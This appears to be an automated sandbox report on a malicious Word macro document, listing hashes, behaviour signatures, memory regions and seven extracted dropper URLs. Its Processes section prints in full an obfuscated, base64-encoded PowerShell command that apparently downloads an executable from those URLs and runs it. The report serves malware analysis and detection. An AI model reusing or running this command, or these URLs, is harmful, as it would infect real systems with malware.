Analysis

  • max time kernel
    120s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 03:43

General

  • Target

    65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc

  • Size

    164KB

  • MD5

    65e3d81e912145deaf34eefd2537fdc7

  • SHA1

    dcedd68b5a21efb1a999fe4ffc35385909528803

  • SHA256

    617f019d01c1d776d1c27243f6786c2c0cfa84182b5f0db4599ad12646ce3dfc

  • SHA512

    9d18a7716b3cccd5b4e091e553405e6797a76e2530415d333e1c4d1cae7b4a3fe18ac9c89656d4ecadab0f154408faf53090b2fe9cfe93a3c828738c16ca8a95

  • SSDEEP

    1536:VAhXAhordi1Ir77zOH98Wj2gpngN+a94ay9y0J6f264NBM:mrfrzOH98ipg4PJ6fQBM

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://www.yusukelife.com/wp/ure/

exe.dropper

https://www.ingyouth.com/wp-includes/0zCW/

exe.dropper

http://alphapharma247.com/wp-content/plugins/r/

exe.dropper

http://muanha24h.com/wp-content/fHS7/

exe.dropper

http://buyhacks.net/wp-content/jgLqdhk/

exe.dropper

https://comsotaque.com/wp-includes/5i/

exe.dropper

https://qualitychildcarepreschool.com/emqblk/Ik2D/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 6 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\65e3d81e912145deaf34eefd2537fdc7_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:776
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e JABXAHUAawBkAGYAaQAzAD0AKAAnAFMAcQAnACsAKAAnAHAAJwArACcAOQBpAHQAJwApACsAJwBzACcAKQA7AC4AKAAnAG4AZQAnACsAJwB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUATgBWADoAdQBTAGUAUgBQAHIATwBmAGkAbABFAFwAcABUADEANgBWAGkANgBcAGIAUABNAGkANQBBAHMAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABpAHIAZQBDAHQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAYABFAGAAQwBVAHIAYABJAHQAeQBQAFIAbwB0AGAAbwBjAE8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAnACwAIAAnACsAKAAnAHQAJwArACcAbABzADEAJwApACsAKAAnADEAJwArACcALAAnACsAJwAgAHQAbABzACcAKQApADsAJABIAHIAMQB0AHEAdwA5ACAAPQAgACgAJwBYADUAJwArACgAJwB3ADYAegAnACsAJwBsAHMAJwApACkAOwAkAEUAXwB1AF8AdwB4AGQAPQAoACgAJwBaAGMAJwArACcAeQA4ACcAKQArACcAbAA1ACcAKwAnADEAJwApADsAJABLAGEANgB4AHAAMAA3AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACgAKAAnADkAVAAnACsAKAAnAHkAJwArACcAUAB0ADEANgAnACsAJwB2ACcAKQArACcAaQAnACsAKAAnADYAJwArACcAOQBUACcAKQArACgAJwB5AEIAcABtAGkANQAnACsAJwBhAHMAJwArACcAOQBUAHkAJwApACkALQBjAFIARQBwAEwAQQBjAEUAIAAoACcAOQAnACsAJwBUAHkAJwApACwAWwBDAGgAYQBSAF0AOQAyACkAKwAkAEgAcgAxAHQAcQB3ADkAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABUADkAZQBlADQAOQB3AD0AKAAoACcAWQAnACsAJwAwAG0AYQAnACkAKwAoACcAcAAnACsAJwB4ADAAJwApACkAOwAkAEIAXwB4AHoAZQBhADYAPQAmACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAE4ARQBUAC4AdwBFAGIAQwBMAGkAZQBuAHQAOwAkAFMAdgBuAHoAbwAwAGMAPQAoACcAaAB0ACcAKwAoACcAdABwADoALwAnACsAJwAvACcAKwAnAHcAdwAnACkAKwAnAHcALgAnACsAJwB5AHUAJwArACgAJwBzACcAKwAnAHUAawBlAGwAJwApACsAKAAnAGkAJwArACcAZgBlAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC8AJwApACsAJwB3AHAAJwArACgAJwAvAHUAJwArACcAcgBlACcAKwAnAC8AKgAnACkAKwAnAGgAJwArACgAJwB0AHQAcABzADoAJwArACcALwAnACkAKwAnAC8AJwArACcAdwAnACsAJwB3AHcAJwArACgAJwAuAGkAbgBnACcAKwAnAHkAbwB1ACcAKQArACgAJwB0AGgAJwArACcALgBjACcAKQArACgAJwBvAG0ALwAnACsAJwB3AHAAJwApACsAJwAtAGkAJwArACcAbgAnACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACkAKwAoACcAcwAvACcAKwAnADAAegBDAFcALwAnACkAKwAnACoAJwArACcAaAAnACsAJwB0AHQAJwArACgAJwBwACcAKwAnADoALwAnACkAKwAnAC8AJwArACcAYQBsACcAKwAoACcAcAAnACsAJwBoAGEAJwApACsAKAAnAHAAJwArACcAaABhAHIAbQBhADIAJwApACsAKAAnADQANwAuACcAKwAnAGMAbwBtAC8AdwBwACcAKwAnAC0AJwApACsAJwBjAG8AJwArACcAbgAnACsAKAAnAHQAZQAnACsAJwBuAHQALwBwAGwAJwApACsAJwB1ACcAKwAnAGcAJwArACgAJwBpAG4AJwArACcAcwAvAHIAJwArACcALwAnACsAJwAqAGgAdAAnACkAKwAoACcAdAAnACsAJwBwADoALwAvACcAKQArACgAJwBtAHUAJwArACcAYQAnACkAKwAnAG4AJwArACcAaAAnACsAJwBhACcAKwAoACcAMgA0AGgAJwArACcALgAnACsAJwBjAG8AbQAnACsAJwAvAHcAcAAtAGMAbwAnACkAKwAoACcAbgB0ACcAKwAnAGUAJwApACsAJwBuACcAKwAoACcAdAAvAGYASAAnACsAJwBTACcAKQArACgAJwA3AC8AJwArACcAKgBoAHQAJwApACsAJwB0ACcAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwBiAHUAJwApACsAJwB5AGgAJwArACgAJwBhAGMAJwArACcAawBzACcAKQArACgAJwAuACcAKwAnAG4AJwArACcAZQB0AC8AdwBwAC0AYwBvAG4AJwArACcAdAAnACsAJwBlACcAKQArACcAbgAnACsAJwB0ACcAKwAnAC8AJwArACgAJwBqACcAKwAnAGcATAAnACkAKwAoACcAcQBkAGgAawAnACsAJwAvACcAKQArACcAKgBoACcAKwAnAHQAdAAnACsAJwBwAHMAJwArACgAJwA6AC8ALwAnACsAJwBjAG8AJwApACsAJwBtAHMAJwArACgAJwBvACcAKwAnAHQAYQBxAHUAZQAuACcAKwAnAGMAbwBtACcAKQArACgAJwAvAHcAJwArACcAcAAtAGkAbgAnACsAJwBjAGwAJwApACsAKAAnAHUAZABlACcAKwAnAHMAJwApACsAJwAvADUAJwArACcAaQAnACsAJwAvACoAJwArACgAJwBoAHQAdABwAHMAJwArACcAOgAnACsAJwAvACcAKQArACcALwBxACcAKwAnAHUAYQAnACsAJwBsACcAKwAoACcAaQAnACsAJwB0AHkAJwApACsAKAAnAGMAJwArACcAaABpAGwAZAAnACkAKwAnAGMAJwArACgAJwBhAHIAJwArACcAZQAnACkAKwAoACcAcAAnACsAJwByAGUAcwAnACkAKwAnAGMAaAAnACsAJwBvACcAKwAnAG8AbAAnACsAJwAuAGMAJwArACgAJwBvAG0AJwArACcALwBlAG0AcQAnACsAJwBiAGwAJwArACcAawAvAEkAJwApACsAKAAnAGsAJwArACcAMgBEAC8AJwApACkALgAiAFMAcABsAGAAaQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQgBkADAAZgB5ADMAZgA9ACgAJwBKACcAKwAnAGYAMAAnACsAKAAnAGYANwAnACsAJwB3AGMAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABaADYAegBoAG8AbwBmACAAaQBuACAAJABTAHYAbgB6AG8AMABjACkAewB0AHIAeQB7ACQAQgBfAHgAegBlAGEANgAuACIAZABPAFcAYABOAGAAbABvAGAAQQBkAEYASQBMAEUAIgAoACQAWgA2AHoAaABvAG8AZgAsACAAJABLAGEANgB4AHAAMAA3ACkAOwAkAEMAaQBkADIAZwBuAG8APQAoACgAJwBLAGEAYwAnACsAJwB5ACcAKwAnAGsAYwAnACkAKwAnADYAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0ACcAKwAnAC0AJwArACcASQB0AGUAbQAnACkAIAAkAEsAYQA2AHgAcAAwADcAKQAuACIAbABgAEUATgBgAEcAVABIACIAIAAtAGcAZQAgADIANgA0ADMANAApACAAewAuACgAJwBJACcAKwAnAG4AJwArACcAdgBvAGsAJwArACcAZQAtAEkAdABlAG0AJwApACgAJABLAGEANgB4AHAAMAA3ACkAOwAkAEQANgBpADcAdQAxAF8APQAoACcAQgAzACcAKwAoACcAeQAwACcAKwAnAHEAeQBsACcAKQApADsAYgByAGUAYQBrADsAJABIADgAZwB1AGgAbgB6AD0AKAAnAFMAMwAnACsAKAAnAHgAMQBzACcAKwAnADMAJwApACsAJwBrACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBiADIAMwA2AGcAdAA9ACgAKAAnAEMAJwArACcAMABlACcAKQArACcAdwAyACcAKwAnAGoAOQAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      40148062ddb187158af7b559887f9aa0

      SHA1

      3fbec9a9f643b6ab37218e44f4b3f0ab8997a928

      SHA256

      7a6e7ba0eda0cb2b7273be8194a08023a0f7f3fb398aa46566081a8f7faa88b4

      SHA512

      4b5b3d7c7f5cd6f5d6604283583bd6ba4863a0f9b76dda76d59d44ae77a846463f661111177756a8d92ec3d341212b96edd74ff3a7f09337e7e58566bfb874f0

    • memory/2220-9-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-68-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2220-6-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-7-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-11-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-10-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-8-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-21-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-26-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-20-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-19-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-18-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-17-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-16-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-15-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-13-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-12-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-0-0x000000002FE71000-0x000000002FE72000-memory.dmp

      Filesize

      4KB

    • memory/2220-22-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-2-0x0000000070C6D000-0x0000000070C78000-memory.dmp

      Filesize

      44KB

    • memory/2220-25-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-31-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-30-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-28-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-27-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-32-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-24-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-23-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-33-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-69-0x0000000070C6D000-0x0000000070C78000-memory.dmp

      Filesize

      44KB

    • memory/2220-29-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-45-0x0000000070C6D000-0x0000000070C78000-memory.dmp

      Filesize

      44KB

    • memory/2220-46-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-51-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-52-0x0000000000780000-0x0000000000880000-memory.dmp

      Filesize

      1024KB

    • memory/2220-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2572-40-0x0000000001D90000-0x0000000001D98000-memory.dmp

      Filesize

      32KB

    • memory/2572-39-0x000000001B5F0000-0x000000001B8D2000-memory.dmp

      Filesize

      2.9MB